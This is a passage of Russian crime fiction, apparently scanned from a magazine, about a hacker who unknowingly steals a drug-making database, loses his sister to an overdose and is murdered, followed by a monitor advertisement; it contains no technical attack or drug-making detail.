Он открыл дверь в ожидании людей с чемоданчиками и красными крес- 
тами, выбегал на площадку, возвращался к Наташе, трогал ее за руку, гладил 
лоб, шептал что-то, постепенно приходя в какое-то безумное состояние. 

«Скорая» прибыла через пятьдесят минут. Пробки. Болезнь большого го- 
рода. Наташка была еще жива. 

Доктор, похоже, видел подобное крайне часто. Все было быстро, четко. 
Смирнов ответил на пару вопросов, помог уложить девушку на носилки - ив 
этот момент зазвонил телефон. 

- Как работа? - раздался голос заказчика. 

- Отстаньте, черт возьми, не до вас сейчас! - огрызнулся Смирнов, но го- 
лос в трубке заставил его замолчать. Ему напомнили о сроках, о деньгах и о 
каких-то непонятных проблемах, которые могут возникнуть, «если что-то пой- 
дет не так». Смирнов выслушал эту короткую гневную тираду, отметив про 
себя только упоминание о деньгах. Наташку надо было лечить, наверняка по- 
надобятся большие средства - Смирнов понял, что он должен закончить ра- 
боту, получить расчет и ринуться спасать сестру. 

Он разузнал, в какую больницу отправят Наташу, записал все телефоны, а 
потом, закрыв дверь и ненавидя своего заказчика больше всех людей на свете, 
он опустился за компьютер и сразу понял, что поиск окончен. То, что было ему 
нужно, лежало перед глазами - только руку протяни. 

На всякий случай он просмотрел несколько директорий, убедился в том, 
что ключевые слова и формулы, переданные ему заказчиком, присутствуют 
на экране, и стал перекачивать данные к себе на компьютер, сразу решив за- 
писать их на болванку, чтобы передать агенту заказчика. Но когда первые 
несколько десятков мегабайт прибыли на его комп, завыл сканер. 

Это был очень интересный сканер - его принесла Наташка около меся- 
ца назад. Программа-шпион. Она была предназначена для поиска на 
компьютере криминальной информации - начиная от банального опреде- 
ления порнографических фотографий по площади обнаженного тела. Она 
умела находить на винчестере изображения воровских наколок, словари 
жаргона и мата, рецепты коктейлей, разного рода вещи, относящие к ис- 
ламской тематике... 

A ese она умела находить сигнатуры наркотиков. 

Вот и сейчас - сканер противно верещал, подмигивая из трея красным 
глазом и указывая на то, что есть смысл просмотреть сообщение. Смирнов 
ткнул в него мышкой и прочитал: «На вашем компьютере в директории «Х- 
Нез» содержится сигнатура наркотика «Хэллоуин» - производного героина. 
Данный наркотик появился на российском рынке уже давно. Организованной 
преступностью налажены поставки его из Южной Америки через страны За- 
падной Европы...». 

Смирнов, как завороженный, смотрел на эти строки, обрамленные в кра- 
сивую рамку. Наркотик - у него на компьютере... 

А потом он понял, что его зацепило. В папку «X-Files» он сливал сейчас 
информацию с сервера, расположенного в Западной Европе. Трэйсер указал 
ему точный адрес - Женева... 

Он откатился от компьютера в кресле и обхватил голову руками. 


- Духи... Парфюмерия... Робин гуд, блин! У богатых беру, бедным даю! 
По-моему, меня элементарно развели... 

И вот тут он понял, что попал в заколдованный круг. 

Чтобы помочь Наташке, ему нужны были деньги. Для этого ему надо бы- 
ло получить все данные и обменить болванку на гонорар. И в России появит- 
ся еще какая-нибудь гадость, которая потом убьет его Наташу. Он должен 
был своими руками наводнить страну наркотой и погубить тысячи людей, 
чтобы спасти сестру. 

Он просмотрел то, что уже приехало к нему на компьютер. Судя по все- 
му, те сигнатуры (а их сканер нашел еще четыре) сами по себе были заказ- 
чику не нужны - просто он по их обрывкам дал Смирнову ориентир. В тех 
файлах, что сливал сейчас Смирнов, содержалась информация о том, как из 
этих пяти наркотиков сделать еще один - новый, сильный и дешевый. Рецеп- 
тура духов для российской молодежи. 

Он смотрел в экран, не слыша завывание сигнализации сканера; тоска 
подступала к горлу, ненависть захлестывала его девятым валом. OH не 
знал, как ему поступить - по закону или по совести. Злоба душила его, зас- 
тавляя широко открывать рот, вдыхая тягучий душный воздух комнаты, но 
он не замечал этого - он видел лишь струйку крови на руке Наташки, ее 
закрытые глаза и расслабленное тело, унесенное дозой наркотика в искус- 
ственный рай. 

И решение пришло внезапно. 

С полки он взял еще одну болванку. Лоток зажужжал, принимая ее. Нес- 
колько кликов мышки - информация стала записываться на диск. Смирнов 
молча смотрел, как полоска загрузки быстро ползет к финишу. Спустя пару 
минут компьютер выплюнул диск, Смирнов взял его, набросал маркером 
несколько цифр, вложил в тоненькую коробочку и позвонил агенту. 

- Все у меня. Жду с деньгами. 

Агент назначил встречу через сорок минут, Смирнова это устраивало - 
место встречи было недалеко от токсикологического центра, в котором лежа- 
ла сейчас Наташа. 

Все произошло быстро - на лавочке в парке агент заказчика включил но- 
утбук, вставил диск в привод, просмотрел что-то, известное только ему одно- 
му, поднял глаза на Смирнова, прищурился и сказал: 

- Аты молодец, парень. Но только ненормальный человек в состоянии 
был сделать то, что сделал ты. Мы ломали их защиту четыре месяца. Ты до- 
был информацию за три дня. 

Он замолчал, вновь посмотрев на экран. Смирнов стоял рядом, глядя по 
сторонам, и практически не интересовался тем, что ему говорят. Было видно, 
что он очень торопится - но сказать об этом он не решился. Агент, продолжая 
нажимать клавиши одной рукой, другой вытащил из внутреннего кармана 
конверт и протянул его Смирнову. Тот взял и спросил: 

- Вопросов нет? Профессиональные тайны я не выдаю, а больше нам 
разговаривать не о чем. 

Собеседник поднял глаза, удивленно усмехнулся, но ничего не сказал. 

- Если нам будет нужно, мы свяжемся с тобой, парень. Удачи. 

Смирнов развернулся и, на ходу запихивая конверт за пазуху, прибавил шагу. 

- «Если будет нужно...». Попробуй найди меня, урод! 

Подняв руку на перекрестке, он очень быстро поймал такси и помчался в 
больницу. Агент продолжал на лавочке листать страницы информации. 

Постепенно взгляд его мрачнел. Еще спустя минуту он вытащил из кар- 
мана сотовый телефон... 

Сидя в такси, Смирнов поймал себя на мысли, что даже не пересчитал, 
сколько там денег, и деньги ли там вообще. Вынул, раскрыл - нет, все было 
в порядке, в конверте были деньги. 

Скоро автомобиль затормозил у приемного отделения. Смирнов выско- 
чил из машины и вбежал на крыльцо... 

Она была мертва уже около получаса. Тело сопроводили в морг, необхо- 
димые документы оформили; ждали только появления родственников. Смир- 
нов в шоке выслушал все, что медики посчитали нужным ему сказать, про- 
должая комкать в кармане конверт с долларами. 

Наташка, такая милая и добрая, такая ЖИВАЯ, была мертва. Эта гадость 
убила ее, подарив несколько часов блаженства и остановив сердце. Почему- 
то Смирнов вспомнил, как ползла по экрану полоска загрузки данных - ис 
каждым перекаченным мегабайтом в сестренке оставалось все меньше и 
меньше жизни. 

Доктор, говоривший с ним, внезапно замолчал и предложил стакан мине- 
ралки. 

- Я понимаю, вам тяжело, - сочувственно сказал он. - Но сделать было 
ничего нельзя. Слишком велика была доза и слишком непредсказуемы пос- 
ледствия того, что творит эта мерзость с людьми - и это несмотря на то, что 
мы знаем про нее практически все. 

- Нет, - внезапно сказал Смирнов. - Вы еще ничего не знаете... 

- Не понял? - наклонил голову доктор. 


- И не надо, - тихо сказал Смирнов. - Я боюсь, что меня может не ока- 
заться рядом, когда... Когда Наташку... Господи... - он с трудом подавил ры- 
дания и продолжил. - Я прошу вас проявить милосердие до конца... 

Он вытащил конверт и на глазах изумленного доктора разделил пачку де- 
нег примерно пополам и отдал половину врачу. 

- Я думаю, вы поняли... 

Врач дрожащей рукой взял деньги и кивнул, потом спросил: 

- Крематорий? 

- Да, - кивнул Смирнов. 

- Знаете, за такие деньги - хоть на Ваганьково, - брякнул, не подумав, 
доктор, но осекся и опустил глаза в пол. 

- Не надо, - тихо сказал Смирнов. - Мне нужно идти. Если повезет - я 
найду вас... Вас и Наташку. 

Доктор долго смотрел вслед уходящему в никуда парню и старался пове- 
рить в происходящее. Последнее, что он увидел - как тот выходит на крыльцо 
и достает сотовый телефон. Потом приехавшая «Скорая» скрыла его от взгля- 
да врача - навсегда. Больше они никогда не встречались. 

Смирнов дозвонился до заказчика с первого раза. 

- Да, это я... Да, так и есть. Мне были нужны деныи... Помолчите и пос- 
лушайте, что я вам скажу. Такие, как вы, не должны жить. Ваш диск - тот, 
настоящий диск - у меня. Завтра я иду в милицию. К сожалению, лишь завт- 
ра. Сегодня я не в состоянии разговаривать ни с кем. Даже с вами мне про- 
тивно общаться, причем с вами в первую очередь. Короче, спокойно жить 
вам осталось двадцать четыре часа. Убийца... 

И он, отключив телефон, швырнул его со всей силы об стену. Пластмас- 
совые панельки разлетелись вдребезги. 

- Поймай меня - если сможешь... 

Стивен Спилберг просто отдыхал... 

Смирнов вышел на проспект, глядя под ноги. Хотелось забыться, выпить 
рюмку-другую водки, пустить слезу... Он был раздавлен случившимся. Все 


Он должен был своими 
руками навоснить страну 
наркотой и погубить тысячи 
людей, чтобы спасти сестру. 


произошло в течение пары часов; нервная система справлялась с трудом, 
едва-едва удерживая разум на плаву. 

Взгляд скользнул по рекламным щитам, афишам, плакатам. Глаза заце- 
пились за неброскую, но выразительную рекламу на стене кинотеатра - чело- 
век в терновом венце с окровавленным лицом. 

«СТРАСТИ ХРИСТОВЫ... 

- Господи, куда ж ты смотрел? - шепнул Смирнов. - Вряд ли ты знаешь 
ответ... 

Но надо было как-то прожить этот день. И Смирнов пошел в «Мегабайт» - 
клуб для таких, как он - «парящих в сети». Знакомый бармен плеснет коньяку 
- хотя обычно он пил только пиво... 

Двери скрыли его от мира. 

А заказчик сидел в своем кабинете, нацепив на мизинец диск и разгля- 
дывая на потолке цветные отблески от него. 

Диск с записанной на него базой данных по наркотикам, выцарапанной 
из программы-шпиона. 

Через несколько минут он швырнул диск на пол и позвонил Павлу... 


жжяхх 


Спустя четыре часа бесплодных поисков в Сети Павел осознал, наконец, 
что так он ничего не добьется. Надо было мыслить как-то иначе, нестандарт- 
но, что ли. Хакер протер покрасневшие усталые глаза, прикрыл веки и заду- 
мался. Задачка на психологию поведения человека в экстремальной ситуации 
оказалась не из простых. 

- Вариант лечь на дно - самый простой и правильный. Скрыться до поры 
до времени на какой-нибудь квартире у знакомых, просто уехать из города... 
Ведь наверняка есть друзья по команде, которые не живут здесь, но по его 
первому сигналу готовы предоставить любое убежище, ведь для них он ку- 
мир. Да и не просто кумир, а скорее, идейный вдохновитель - ведь плодами 
его трудов, его программами и принципами работы пользуются не один де- 
CATOK человек. Короче, он сейчас в сеть не пойдет... 

Павел понял, что он просто потерял время, стараясь напасть на следы 
Смирнова в интернете. Глупо и бездарно вцепившись в компьютер, он пы- 
тался поймать человека, который был на голову выше всех хакеров этого го- 
рода - человека, который очень тонко чувствовал, когда сеть служит ему до- 
мом, а когда тюрьмой. 
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Внезапно он поймал себя на мысли - спустя столько часов после звонка - 
что согласия на то, чтобы найти Смирнова, он не давал; наоборот, он прекра- 
тил разговор, дав понять, что не собирается совершать какие-то поступки 
против совести. Но почему-то занимается поисками «Акулы» на таком уровне, 
как будто они подписали контракт... 

- Что меня так заинтересовало? Деньги? Пожалуй, - хмыкнул Павел. - Как 
говорится, ничего личного... 

Он встал из-за стола, прошелся по комнате и, выглянув в окно, за кото- 
рым уже стемнело, задумался. 

Внезапно пришло озарение. Вспомнился Ефим Шифрин - «И тут как 
солнце из-за туч... прояснило!» Фраза очень прочно вошла в его лексикон - 
смешная и чертовски точная. Он всмотрелся в огни реклам и проезжающих 
автомобилей, словно надеясь увидеть там одинокую фигурку Смирнова, бре- 
дущую по проспекту, а потом рванул к телефону и перезвонил - сам. 

На том конце трубку взяли практически мгновенно. Не то что бы его жда- 
JIM - но человек не отходил от телефона, надеясь на удачу. 

- Слушаю, - голос слегка взволнованный - неужели на самом деле был 
элемент неверия в то, что он позвонит? 

- Это Павел... 

- Я понял. Говорите. 

- Есть мысль, - Павел на секунду замолчал, стараясь придать себе и сво- 
ему голосу максимум уверенности. - Даже не мысль, скорее, промежуточный 
итог логических рассуждений... Но я могу ошибаться. 

- Короче. 

- Я думаю... Одним словом, загляните в «Мегабайт»... 

- Никогда не слышал, - человек на том конце провода немного заволно- 
вался. - Что это? 

- Что-то типа клуба для людей, подобных «Акуле»... Смирнову, - поправил 
себя Павел, думая, что собеседнику неизвестен ник хакера. - Обыкновенный 
с виду ночной клуб со всеми причитающимися этому типу заведений регали- 


Глаза, затянутые алкогольной 
пеленой, разглядывали каждую 
черточку лица Наташки, 
вспоминали каждый кадр... 


ями - баром, дискотекой на два танцпола, бильярдом и всякой всячиной по- 
добного рода. Но там есть еще один зал - эксклюзив, так сказать... Высокос- 
коростной доступ в интернет, тусовка людей, привязанных к миру высоких 
технологий не только увлечением, но и Уголовным кодексом... Войти туда 
сложно, отследить человека, не имея на то прав и допуска во внутренние по- 
мещения, практически невозможно... 

- Возможно все, - оборвали Павла. - Где это? 

Павел объяснил, назвал кодовое слово; потом возникла пауза. Человек и 
не прекращал разговор, и не торопился продолжить его в контексте гонорара. 

- И?.. - решился спросить Павел. 

- Вы о деньгах? Не беспокойтесь. Правда, придется подождать, пока я 
решу свою проблему, ибо у меня к вашему братству теперь доверие очень и 
очень низкое... Скажу одно - если все получится, вас ждет награда гораздо 
большая, чем я говорил... 

- Сколько? - совершенно неожиданно для самого себя спросил Павел - 
вопрос вырвался из него против его воли. 

- Вам понравится... Итак, до встречи. Вас найдут. При любом исходе дела. 

В трубке раздались гудки. Павел прижал ее к груди и задумался... 


жжжях 


Раньше Смирнов приходил сюда часто - едва ли не два-три раза в не- 
делю. И бармен, и администратор зала, и программисты, обслуживающие 
технику в этом чудо-центре, в этом рае для хакеров, изучили его пристрас- 
тия и в пиве, и в машинах, и в программном обеспечении, гордились тем, 
что их заведение посещает столь известная личность и делали все для то- 
го, чтобы еще больше угодить ему - не из подхалимажа, а из вполне зас- 
луженного уважения. 

Каждый визит сюда становился чуть ли не легендой; ребята за соседни- 
ми компами пялились через плечо в его экран, пытаясь разгадать какие-то 
секреты мастера, следили за движениями его рук, за выражением глаз, ста- 
рались подражать ему даже в походке. 

Внутренний мир клуба «Мегабайт» был обустроен по последнему сло- 
ву техники - два ряда по десять компьютеров в центре плюс за пятью VIP- 
столиками еще по одной машине; в двух углах зала по бару - один пивной 
с высоким золотистым краном и надписью «Carlsberg», другой для всего 
остального. 
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Сказать, что внутри было тихо, нельзя - иногда возникали довольно шум- 
ные споры за компьютерами или возле бара, но вот звуки дискотеки сюда не 
проникали, даже басы были погашены при помощи хитрой изоляции. 

Смирнов сидел за одним из \ЛР-компьютеров в дальнем углу зала и поти- 
хоньку накачивался коньяком. На экране монитора с интервалом в полминуты 
сменялись фотографии Наташки, сделанные им в период, когда он увлекся 
цифровой съемкой и сестра была его единственной моделью - на природе, 
на улицах, в парке. Он перекачал всю коллекцию в интернет, в одно из част- 
ных хранилищ, закрыл паролем для того, чтобы никакая сволочь не восполь- 
зовалась этими невинными изображениями в корыстных мерзких целях, и 
имел доступ к этому фотоальбому всегда и всюду, где был компьютер. Пос- 
ледний раз он заглядывал сюда пару недель назад безо всякой причины, 
просто захотелось увидеть глаза сестренки, которая стала все чаще пропа- 
дать со своими друзьями... 

Как в воду смотрел... 

Он плеснул себе еще полрюмки коньяка, рука дрогнула, несколько капель 
попали на стол, но он не замечал этого. Глаза, затянутые алкогольной пеле- 
ной, разглядывали каждую черточку лица Наташки, вспоминали каждый кадр, 
каждый день... 

Губы шевелились, рассылая проклятия в адрес всех, кто приложил руку к 
тому, что его сестра стала наркоманкой. Временами голова падала на грудь, 
но он находил в себе силы не спать. Опьянение постепенно превращалось в 
отравление. Вот-вот он уже мог упасть со стула на пол; мысль об этом заста- 
вила пододвинуть стул поближе, лечь на руки и задремать - беспокойно, 
вздрагивая. Дернувшись во сне, он свалил на пол пустую бутылку и привлек 
внимание бармена. Тот решил дать Смирнову заснуть покрепче, после чего 
перенести уважаемого человека в комнату с диваном. 

Человек, который вошел в бар в ту минуту, когда «Акула» заснул, был нико- 
му не известен - но он сказал «слово». Ему указали на один из свободных 
компьютеров - он отказался. Тогда бармен администратор оставил его в покое, 
предоставив найти самому занятие и место по душе. Гость прошелся по залу, 
периодически заглядывая в экраны работающих компьютеров и в лица сидя- 
щих за ними людей. Особого внимания на него не обращали. 

Несколько секунд он постоял над пьяным «Шарком», покачал головой, де- 
монстративно перешагнул через лежащую на полу бутылку и направился к вы- 
ходу. Бармен проводил его удивленным взглядом и направился к Смирнову. 

Тот лежал совершенно неподвижно, зажав в руке пустую рюмку. Из-под 
его головы медленно расползалась по столу лужа алой крови, подсвеченная 
неоновыми лампами... 

А на экране сменяли друг друга фотографии еще живой Наташки. 


особа 


Павлу позвонили через полтора часа. Голос собеседника был уже не та- 
ким напряженным, как раньше: 

- Хочу сообщить вам, что ваши предположения были верны, - услышал 
Павел. - Мне удалось найти этого человека. Проблема с ним решена. 

- Не скажу, что рад это слышать, - ответил Павел. - Но, в конце концов, 
все имеет свою цену... 

- Совершенно верно, - одобрительно прозвучало в ответ. - Вы наверняка 
ждете моей благодарности? 

- Естественно, - кивнул Павел. 

- Все будет, всему свое время... 

Павел напрягся - такими словами обычно начинаются разговоры о том, 
что надо немного подождать. 

- Дышите ровнее, я не обману вас. Но после Смирнова осталась нере- 
шенной одна задачка... 

- Задачка? - спросил Павел, понимая, что его пытаются подсадить на 
цепь событий - каждое последующее увеличивало вознаграждение, но вот 
дождаться его было очень и очень сложно, тут бы живым уйти... 

В трубке немного помолчали, потом снова раздался голос - как приговор: 

- Я думаю, что зря спросил вас. Вы не сможете сделать то, что сделал 
Смирнов. Ваша участь иная. 

- Какая? 

- Сметать с пути гениев. Жаль, но я понял это только что. Как передать 
вам деньги? 

Павел немного подумал, потом назначил место и время. 

- Ждите, - коротко ответил собеседник и положил трубку. Павел спустя 
секунду сделал то же самое и крепко задумался... 

Агент прождал его в парке почти час. Павел не пришел. 

Он висел в своей ванной на куске бельевой веревки, не в силах совла- 
дать с тем, что даже стены его квартиры кричали ему: 
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Ничего лишнего 
зупсМазег 173P — монитор 
без кнопок на передней панели 


DigitAll минимализм монитор SyncMaster 173Р настолько совершенен, что кнопки были бы 
лишними, Программное обеспечение Samsung Magic Tune™ позволяет выполнять все настройки экрана 
с помощью мыши. Ультратонкий экран толщиной всего 2 см вращается на 160° м прекрасно смотрится 
BOSOM ракурсе. Неудивительно, что Samsung является обладателем 67 международных наград за дизайн. 
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